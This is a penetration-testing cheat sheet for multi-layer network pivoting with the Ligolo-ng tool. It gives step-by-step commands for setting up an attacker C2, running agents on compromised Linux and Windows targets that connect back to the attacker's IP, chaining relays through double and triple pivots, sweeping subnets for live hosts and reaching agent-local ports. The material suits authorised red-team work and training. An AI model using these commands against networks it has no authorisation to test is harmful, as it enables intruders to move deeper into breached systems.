Pivoting Cheatsheet

Initial Setup (Attacker C2)

Create TUN interfaces and routes on your C2 before each pivot layer:

# Interface for pivot 1
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

# Interface for pivot 2
sudo ip tuntap add user $(whoami) mode tun ligolo2
sudo ip link set ligolo2 up

# Interface for pivot 3
sudo ip tuntap add user $(whoami) mode tun ligolo3
sudo ip link set ligolo3 up

On Ligolo-ng >= v0.6 use interface_create --name ligolo from the proxy CLI instead of ip tuntap.

Pivot 1 — Initial Foothold

C2: Start proxy listener

./proxy -selfcert -laddr 0.0.0.0:<lport>

Target 1 (Linux): Transfer and run agent

./agent -connect <attacker-ip>:<lport> -ignore-cert

Target 1 (Windows):

.\agent.exe -connect <attacker-ip>:<lport> -ignore-cert

C2 proxy console: Select session and start tunnel

ligolo-ng » session
[select session]
ligolo-ng » start --tun ligolo

C2: Add route to pivot 1 subnet

sudo ip route add <subnet-1>/24 dev ligolo

Discover hosts in pivot 1 subnet (Linux):

for i in {1..254}; do (ping -c 1 <subnet-1>.$i | grep "bytes from" &); done

Discover hosts in pivot 1 subnet (Windows):

for /L %i in (1,1,254) do ping <subnet-1>.%i -n 1 -w 100 | find "Reply"

Pivot 2 — Double Pivot

C2 proxy console (session 1 still active): Add listener to relay agent connections through Target 1

[Agent : target1] » listener_add --addr 0.0.0.0:<lport> --to 127.0.0.1:<lport> --tcp

Target 2 (Windows): Run agent pointing at Target 1

.\agent.exe -connect <target1-ip>:<lport> -ignore-cert

Target 2 (Linux):

./agent -connect <target1-ip>:<lport> -ignore-cert

C2 proxy console: Select the new session (Target 2) and start tunnel on ligolo2

ligolo-ng » sessions
[select Target 2 session]
ligolo-ng » start --tun ligolo2

C2: Add route to pivot 2 subnet

sudo ip route add <subnet-2>/24 dev ligolo2

Pivot 3 — Triple Pivot

C2 proxy console (session 2 active): Add listener on Target 2 to relay to C2

[Agent : target2] » listener_add --addr 0.0.0.0:<lport> --to 127.0.0.1:<lport> --tcp

Target 3 (Windows): Run agent pointing at Target 2

.\agent.exe -connect <target2-ip>:<lport> -ignore-cert

Target 3 (Linux):

./agent -connect <target2-ip>:<lport> -ignore-cert

C2 proxy console: Select the new session (Target 3) and start tunnel on ligolo3

ligolo-ng » sessions
[select Target 3 session]
ligolo-ng » start --tun ligolo3

C2: Add route to pivot 3 subnet

sudo ip route add <subnet-3>/24 dev ligolo3

Port Forwarding Local Ports

Ligolo-ng uses the hardcoded CIDR 240.0.0.0/4 (multicast space) to redirect agent-local ports to your C2.

Forward a port on Target 1 (pivot 1 interface):

sudo ip route add 240.0.0.1/32 dev ligolo

Forward a port on Target 2 (pivot 2 interface):

sudo ip route add 240.0.0.2/32 dev ligolo2

Then access Target 1's local port 8080 as 240.0.0.1:8080 from your C2. Each interface gets a different 240.0.0.x address.

Quick Reference

Action	Command
List sessions	`sessions`
Start tunnel (pivot 1)	`start --tun ligolo`
Start tunnel (pivot 2)	`start --tun ligolo2`
Add listener relay	`listener_add --addr 0.0.0.0:<lport> --to 127.0.0.1:<lport> --tcp`
Show agent interfaces	`ifconfig`
Create interface (>=0.6)	`interface_create --name ligolo`
Add route via CLI (>=0.6)	`interface_add_route --name ligolo --route <subnet>/24`
List listeners	`listener_list`
Stop listener	`listener_stop <id>`